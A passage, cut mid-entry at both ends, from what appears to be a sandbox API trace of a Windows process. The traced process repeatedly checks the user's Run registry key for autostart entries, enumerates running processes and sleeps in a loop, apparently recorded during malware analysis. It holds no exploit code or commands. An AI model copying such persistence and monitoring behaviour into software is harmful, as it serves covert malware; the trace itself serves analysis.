ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.626] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.629] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.629] NtClose (Handle=0x154) returned 0x0 [0184.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.633] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.642] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.642] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.642] NtClose (Handle=0x154) returned 0x0 [0184.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.646] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.657] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.658] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.658] NtClose (Handle=0x154) returned 0x0 [0184.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.662] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.673] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.673] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.673] NtClose (Handle=0x154) returned 0x0 [0184.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.677] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.689] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.689] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.689] NtClose (Handle=0x154) returned 0x0 [0184.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.693] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.704] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.704] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.704] NtClose (Handle=0x154) returned 0x0 [0184.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.709] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.720] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.721] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.721] NtClose (Handle=0x154) returned 0x0 [0184.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.725] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.740] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.741] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.741] NtClose (Handle=0x154) returned 0x0 [0184.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.751] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.751] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.751] NtClose (Handle=0x154) returned 0x0 [0184.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.755] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.768] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.768] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.768] NtClose (Handle=0x154) returned 0x0 [0184.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.782] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.782] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.782] NtClose (Handle=0x154) returned 0x0 [0184.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.787] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.798] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.798] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.798] NtClose (Handle=0x154) returned 0x0 [0184.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.813] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.814] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0184.814] NtClose (Handle=0x154) returned 0x0 [0184.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0184.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0184.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0184.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0184.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0184.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0184.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0184.829] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0184.830] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: 